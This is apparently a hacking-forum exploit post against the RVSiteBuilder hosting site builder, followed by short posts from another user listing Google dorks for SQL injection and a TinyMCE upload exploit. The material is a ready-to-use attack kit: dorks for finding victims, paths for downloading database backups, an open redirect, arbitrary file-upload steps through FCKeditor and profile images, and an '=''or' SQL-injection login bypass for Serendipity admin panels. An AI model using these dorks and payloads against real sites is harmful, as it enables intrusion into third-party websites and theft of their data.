# Description : RVglobalsoft is the leading software solution for hosting providers.
# Vulnerabilities and Exploits include =>
1) Full Path Disclosure Vulnerability
2) SQL Injection Vulnerability
3) Arbitrary File Upload Vulnerability
4) Arbitrary File Download Database Backup .sql Vulnerability
5) What You See Is What You Get [ WYSIWYG ] FCKeditor Exploiter
6) Blog Administration Control Panel Authentication Bypass Vulnerability
7) Directory Traversal Vulnerability and Information Exposure Through Directory Listing
8) Information Exposure Through an Error Message
9) Permissions, Privileges, and Access Controls
# Google Dork 1 : inurl:''/rvsindex.php/''
# Google Dork 2 : inurl:''/rvsindex.php?/user/login''
# Google Dork 3 : inurl:''/rvsindex.php/user/register''
# Google Dork 4 : Index of /js Parent Directory SGL.js SGL/ SglFckconfig.js TreeMenu.js datetimepicker.js
#################################################################################################
# RevSiteBuilder Full Path Disclosure Vulnerability and PHP Warnings and Errors [ Critical Vuln for Server Rooting ] =>
TARGET/blog/rvsindex.php?/sitebuilder/action/list/
Strict Standards: Declaration of RVFlexyStrategy::initEngine() should be compatible with SGL_OutputRendererStrategy::initEngine() in /opt/cpanel/ea-php56/root/usr/share/pear/RVSeagullMod/lib/SGL/RVFlexyStrategy.php on line 89
Strict Standards: Declaration of RVFlexyStrategy::render() should be compatible with SGL_OutputRendererStrategy::render($view) in /opt/cpanel/ea-php56/root/usr/share/pear/RVSeagullMod/lib/SGL/RVFlexyStrategy.php on line 89
Strict Standards: Non-static method SGL_FrontController::isGoToClearCached() should not be called statically in /opt/cpanel/ea-php56/root/usr/share/pear/RVSeagullMod/lib/SGL/FrontController.php on line 257
Strict Standards: Declaration of SGL_MDB2::query() should be compatible with MDB2_Driver_Common::query($query, $types = NULL, $result_class = true, $result_wrap_class = true) in /home/koleksim/.rvsitebuilder/websitepublish/3686a6380b5f3a8986f5ef385ce208f5/var/cachedLibs.php on line 82
Deprecated: Non-static method SGL_Task_SetupPaths::hostnameToFilename() should not be called statically, assuming $this from incompatible context in /opt/cpanel/ea-php56/root/usr/share/pear/RVSeagullMod/lib/SGL/Config.php on line 60
Warning: Include path '/usr/lib/php' not exists in /home/DOMAINADDRESS/public_html/rvscommonfunc.php on line 174
Please contact your host provider ssh as root to server and run.
FOR CPANEL =>
pear install -f /var/cpanel/rvglobalsoft/rvsitebuilder/scripts/RVSeagullMod-1.0.1.tgz
perl /usr/local/cpanel/whostmgr/docroot/cgi/rvsitebuilderinstaller/autoinstaller.cgi
FOR DIRECTADMIN =>
pear install -f /usr/local/rvglobalsoft/rvsitebuilder/scripts/RVSeagullMod-1.0.1.tgz
perl /usr/local/rvglobalsoft/rvsitebuilderinstaller/autoinstaller.cgi
Fatal error: Class 'SGL_FrontController' not found in /home/DOMAINADDRESS/public_html/rvsindex.php on line 20
####################################################################################################
PATH => TARGET/ComponentAndUserFramework.php
Please edit /home2/DOMAINADDRESS/public_html/php.ini change include_path to include_path = ".:/usr/php/54/usr/lib64:/usr/php/54/usr/share/pear:/usr/local/lib/php"
# PATH for View Homepage => TARGET/rvsindex.php
####################################################################################################
# PATH RevSiteBuilder Admin Login Control Panel => TARGET/admin
or this is the Admin Panel way => /rvsindex.php?/user/login/
# PATH Admin Panel Login WordPress => TARGET/wp-login.php?redirect_to=http%3A%2F%2FDOMAINADDRESS%2F%2Fwp-admin%2F&reauth=1
# PATH Admin Panel Login Joomla => TARGET/administrator
# PATH Admin Panel Login osCommerce => TARGET/admin
# PATH Admin Panel Login OpenCart => TARGET/admin
Note : Some RVSiteBuilder websites use WordPress and Joomla, but all files belong to RVSiteBuilder and RVGlobalSoft software. It is a totally weird vulnerability. They have paths like TARGET/blogweb or TARGET/osc, but some sites give this error. Sometimes it asks for a username and password.
Please contact your provider edit file php.ini change include_path to include_path = ".:/usr/lib/php:/usr/local/lib/php" save file and restart apache
####################################################################################################
# PATH for Uploaded Documents => TARGET/documents/
####################################################################################################
# PATH for JS JQuery-Ui Demos and Documents [ View Original Sources ] => TARGET/js/jquery-ui/demos/ and TARGET/js/jquery-ui/docs/
# You can view => Interactions - Widgets ~ Effects ~ About jQuery UI ~ Theming - View Sources
####################################################################################################
# PATH for JQuery Tests Version => TARGET/js/jquery-ui/tests/
####################################################################################################
# PATH for Themes Codes => TARGET/js/jquery-ui/themes/base/ and TARGET/js/themes/
####################################################################################################
# PATH jscalendar-1.0 "It is happening again" => TARGET/js/jscalendar/ => The Coolest DHTML Calendar - Online Demo
####################################################################################################
# PATH Changelog Last Changes => TARGET/js/scriptaculous/CHANGELOG
####################################################################################################
# PATH Learn Version => TARGET/js/scriptaculous/VERSION
####################################################################################################
# PATH for Optimizer => TARGET/optimizer.php
Please edit /home2/DOMAIN/public_html/php.ini change include_path to include_path = ".:/usr/php/54/usr/lib64:/usr/php/54/usr/share/pear:/usr/local/lib/php"
####################################################################################################
# Other Paths that give the same error
=> #TARGET/rvsMasterCompoDB.php #TARGET/rvsStaticWeb.php #TARGET/rvscommonfunc.php #TARGET/rvssetup.php Please edit /home2/DOMAIN/public_html/php.ini change include_path to include_path = ".:/usr/php/54/usr/lib64:/usr/php/54/usr/share/pear:/usr/local/lib/php" #################################################################################################### #QuickForm tutorial example - *Enter your name: #/scripts/rvslib/Pear/quickFormTest.php #/themes/default/default/testForms.html #################################################################################################### #{if:adminApprove} {adminApprove} #/themes/rvtheme/authweb/authPage.html #################################################################################################### #{foreach:aFaqData,key,aValue} {if:aValue.category_name} #/themes/rvtheme/faqweb/viewFaqWeb.html ################################################################################################### #{if:forumsInstall} - Search for forums #TARGET/themes/rvtheme/forums/blocksearch.html #################################################################################################### # Testing forms # /themes/default/testForms.php ################################################################################################# # RevSiteBuilder RVGlobalSoft Open Redirection Vulnerability # TARGET/login => It automatically redirects to this URL Link here => /rvsindex.php?/user/login/action/login # Open Redirection Page /rvsindex.php?/user/login/redir/ANY-DOMAIN-ADRESS ################################################################################################# # {translate(pageTitle)} Contactus # /themes/rvtheme/main/contactMail.html ################################################################################################# #{translate(#Please enter your name and e-mail address and select the newsletters that you want to subscribe.#)} #/themes/rvtheme/newsletter/authorize.html 
#/themes/rvtheme/newsletter/list.html #/themes/rvtheme/newsletter/uikit_list.html ################################################################################################# #RVTheme Admin Area and Users useable Login Paths => #/themes/rvtheme/user/account.html #/themes/rvtheme/user/accountSummary.html #/themes/rvtheme/user/blockLogin.html #/themes/rvtheme/user/blockLogout.html #/themes/rvtheme/user/horizontalBlockLogin.html #/themes/rvtheme/user/loginForgot.html #/themes/rvtheme/user/prefUserEdit.html #/themes/rvtheme/user/profile.html #/themes/rvtheme/user/uikit_login.html #/themes/rvtheme/user/uikit_loginForgot.html #/themes/rvtheme/user/uikit_prefUserEdit.html #/themes/rvtheme/user/uikit_userAddUseCompoDB.html #/themes/rvtheme/user/uikit_userPasswordEdit.html #/themes/rvtheme/user/userAdd.html #/themes/rvtheme/user/userAddUseCompoDB.html #/themes/rvtheme/user/userPasswordEdit.html #/themes/rvtheme/user/verticalBlockLogin.html #/themes/rvtheme_admin/articleweb/admin_articleEdit.html #/themes/rvtheme_admin/articleweb/admin_articleManager.html #/themes/rvtheme_admin/articleweb/admin_articleTypeEdit.html #/themes/rvtheme_admin/articleweb/admin_articleTypeManager.html #/themes/rvtheme_admin/faqweb/admin_faqCategoryEdit.html #/themes/rvtheme_admin/faqweb/admin_faqWebEdit.html #/themes/rvtheme_admin/faqweb/admin_faqWebManager.html #/themes/rvtheme_admin/css/ ##################################################################################################### #Learn Version of the RVSiteBuilder and RVGlobalSoft => TARGET/version.txt ##################################################################################################### #Flash Player Version Detection => TARGET/Scripts/AC_RunActiveContent.js ##################################################################################################### Getting started with Seagull Project => [ Seagull PHP Framework - © Seagull Systems 2003-2007 ] /rvsindex.php?/default/masterLayout/layout-navtop-3col.css/ 
##################################################################################################### # RevSiteBuilder SQL Injection Vulnerability => #Strict Standards: Declaration of RVFlexyStrategy::initEngine() should be compatible with SGL_OutputRendererStrategy::initEngine() in /usr/local/lib/php/RVSeagullMod/lib/SGL/RVFlexyStrategy.php on line 89 #Strict Standards: Declaration of RVFlexyStrategy::render() should be compatible with SGL_OutputRendererStrategy::render($view) in /usr/local/lib/php/RVSeagullMod/lib/SGL/RVFlexyStrategy.php on line 89 #Warning: include(SGL_PATH/lib/SGL/FrontController.php): failed to open stream: No such file or directory in /home/DOMAINADDRESS/public_html/wysiwyg/fckeditor/editor/filemanager/connectors/php/config.php on line 264 ################################################################################################# # What You See Is What You Get [ WYSIWYG ] Exploiter => # WYSIWYG FCKeditor Arbitrary File Upload Vulnerability and Exploit # Exploit => ..../wysiwyg/fckeditor/editor/filemanager/connectors/uploadtest.html # Example Site => /images/.... # Allowed File Extensions => .txt .png .gif .jpg .xml # Sometimes Wysiwyg Editor Gives this error when trying upload a file to the server Please contact your host provider ssh as root to server and run. For cpanel pear install -f /var/cpanel/rvglobalsoft/rvsitebuilder/scripts/RVSeagullMod-1.0.1.tgz perl /usr/local/cpanel/whostmgr/docroot/cgi/rvsitebuilderinstaller/autoinstaller.cgi For directadmin pear install -f /usr/local/rvglobalsoft/rvsitebuilder/scripts/RVSeagullMod-1.0.1.tgz perl /usr/local/rvglobalsoft/rvsitebuilderinstaller/autoinstaller.cgi Tutorial '' How to download RVsiteBuilder package file manually ? 
'' For cPanel -------------------- SSH to your cPanel server as root and run command cd /usr/local/cpanel/whostmgr/docroot/cgi/ rm -rf /usr/local/cpanel/whostmgr/docroot/cgi/rvsitebuilderinstaller/ rm -f rvsitebuilderinstaller.tar wget http://download.rvglobalsoft.com/rvsitebuilderinstaller.tar tar -xvf rvsitebuilderinstaller.tar rm -f rvsitebuilderinstaller.tar mkdir /usr/local/cpanel/whostmgr/docroot/cgi/rvsitebuilderinstaller/packages cd /usr/local/cpanel/whostmgr/docroot/cgi/rvsitebuilderinstaller/packages wget http://download.rvglobalsoft.com/download.php/rvsdownload/scriptdownloadpackage.tar tar -xvf scriptdownloadpackage.tar /usr/local/cpanel/3rdparty/bin/php scriptdownloadpackage.php Once complete download file manually, please follow the instruction in this link. https://www.rvsitebuilder.com/installation/ -------------------- For DirectAdmin -------------------- SSH to your cPanel server as root and run command cd /usr/local/rvglobalsoft/rvsitebuilderinstaller/packages wget http://download.rvglobalsoft.com/download.php/rvsdownload/scriptdownloadpackage.tar tar -xvf scriptdownloadpackage.tar php scriptdownloadpackage.php Once complete download file manually, please follow the instruction in this link. 
https://www.rvsitebuilder.com/installation/ Reference => rvglobalsoft.com/knowledgebase/article/148/how-to-download-rvsitebuilder-package-file-manually/ Reference => rvskin.com/rvlogin/rvloginssh ################################################################################################## # RevSiteBuilder Arbitrary File Database DB Backup .sql Download Vulnerability # TARGET/rvsDbBackup.sql => OR download and view SQL Database Backup Files => TARGET/rvsUtf8Backup/rvsDbBackup.sql # View RevSiteBuilder Page Data Backup => TARGET/rvsUtf8Backup/rvsPageData.sql # Example Site DB Backup View => archive.is/Demkr ################################################################################################### 1) Register yourself to the site TARGET/rvsindex.php?/user/register/ It says => You have successfully been registered. Please check your email for confirmation of your password. Note : Confirm your registration in order to proceed. Sometimes RVSiteBuilder and RVGlobalsoft gives you a new password or you choose your password while registration. Pay attention : When you register choose your nickname carefully because it is important. It says => Activation is successfully. Please login. 2) Login to the User Interface => TARGET/rvsindex.php?/user/login/action/login 3) You can use Account - User Preference - User Password Change Area /rvsindex.php?/user/account/action/viewProfile/ /rvsindex.php?/user/account/ /rvsindex.php?/user/userpreference/ /rvsindex.php?/user/userpassword/action/edit/ 4) Go to your Profile like this => TARGET/rvsindex.php?/user/account/action/viewProfile/ Edit these Values Choose Image Upload => Allowed File Extensions ( jpg,gif,bmp,png,txt,html) It says => Your profile details have been successfully updated PATH : /themes/rvtheme/images/YOURNİCKNAME. Note : Your chosen nickname is important while registration. Upload your html or txt file but do not put like this .yournickname.html Just . [ dot ] is important here. 
You will see your index on that site. ################################################################################################# # Serendipity RevSiteBuilder Blog Administration # /blogweb/serendipity_admin.php # Username : '=''or' # Password : '=''or' # You can use for both of them as '' admin '' '' admin '' # /serendipity/serendipity_admin.php?serendipity[adminModule]=media&serendipity[adminAction]=addSelect # /blogweb/serendipity_admin_image_selector.php?serendipity[htmltarget]=img_icon&serendipity[filename_only]=true # /blogweb/serendipity_admin.php?serendipity[adminModule]=media&serendipity[adminAction]=addSelect # /blogweb/serendipity_admin.php?serendipity[adminModule]=personal # /blogweb/uploads/yourfilename.rar # Solution for Serendipity Blog Administration # To mitigate this issue please upgrade at least to version 2.0.2: # Download Link : https://github.com/s9y/Serendipity/releases/download/2.0.2/serendipity-2.0.2.zip # Please note that a newer version might already be available. ################################################################################################# How to Install RVsitebuilder for Hosting Provider [ Bugs Fixation ] Check every folder and limit with .htaccess cPanel ssh to your server as root and install plugin 'RVglobalsoft manager' by run following shell command: cd /usr/src; rm -fv rvsitebuilderinstall.sh; wget http://download.rvglobalsoft.com/rvsitebuilderinstall.sh; chmod +x rvsitebuilderinstall.sh; ./rvsitebuilderinstall.sh Login to WHM as root. Go to WHM > Plugins > and run RVglobalsoft manager then follow simple install process. Configure plugin for your panel. It's all done! RVsitebuilder is ready to use for all your users. 
DirectAdmin ssh to your server as "root" and install plugin 'RVglobalsoft manager' by run following shell command: cd /usr/src; rm -fv rvsitebuilderdainstall.sh; wget http://download.rvglobalsoft.com/rvsitebuilderdainstall.sh; chmod +x rvsitebuilderdainstall.sh; ./rvsitebuilderdainstall.sh For DirectAdmin panel with PHP version 5.5 only (If your panel is lower version of PHP, skip to step 3) 2.1 Run the following command to make RVsitebuilder compatible with PHP 5.5: perl /usr/local/directadmin/plugins/rvsitebuilderinstaller/admin/installphpda.pl 2.2 Run the following command to make RVseagullmod compatible with PHP 5.5: perl /usr/local/rvglobalsoft/rvsitebuilderinstaller/autoinstaller.cgi --force=rvseagullmod Open file 'directadmin.conf' that located in: usr/local/directadmin/conf/directadmin.conf and change the value of 'numservers' from 5 to 15 Go to Directadmin > Admin level > and run 'RVsitebuilder Admin' then follow simple install process. Login to DirectAdmin as "admin" and Configure plugin on your panel. RVsitebuilder in DirectAdmin plugins cannot configure hosting plans but you can set plans in user level by RVsitebuilder Admin Go to Directadmin > Admin level > open RVsitebuilder Admin and configure in 'User Control List' or 'Reseller Control List.' 
    #################################################################################################
    RVSiteBuilder Last Changes and Bugs Fixation Reports [ Changelog ] => rvsitebuilder.com/changelog/
    RVSiteBuilder Installation => rvsitebuilder.com/installation/
    RVSiteBuilder and RVGlobalSoft Tutorials => rvsitebuilder.com/tutorials/ ~ rvglobalsoft.com/installation/ ~ documentation.cpanel.net/display/68Docs/Installation+Guide
    ##################################################################################################
    # Example Vulnerable Sites =>
    #################################################################################################
    # Discovered By Hacker KingSkrupellos from Cyberizm.Org Digital Security Team 2012 - 2018
  10. mohammad_ghazei

    Hacking-Penetration testing to the site

    Dork: intext:''Дизайн: «Чипса» Разработка сайта: weltgroup'' site:ru - intext:''Разработка сайта Weltgroup'' site:ru sql injection hosting :)))
  11. mohammad_ghazei

    Hacking-Penetration testing to the site

    Dork: intext:''Desgined By Catpops Technobiz'' - intext:''Designed By Catpops Technobiz'' sql injection
  12. mohammad_ghazei

    Hacking-Penetration testing to the site

    # Dork: inurl:"index.php?scelta=campi" sql injection
  13. mohammad_ghazei

    Hacking-Penetration testing to the site

    # Google Dork: inurl:/dipnotpanel/js/tinymce/plugins/fileman # Exploit: /dipnotpanel/js/tinymce/plugins/fileman/php/upload.php # Access the site with /dipnotpanel/js/tinymce/plugins/fileman/Uploads/file.jpg
  14. mohammad_ghazei

    Hacking-Penetration testing to the site

    "Design & Developed By Seawind Solution Pvt. Ltd." SQL Injection Vulnerability
  15. mohammad_ghazei

    Hacking-Penetration testing to the site

    intext:''Design by Christian Bernal - Development by Monoattack'' site:ec SQL Injection Vulnerability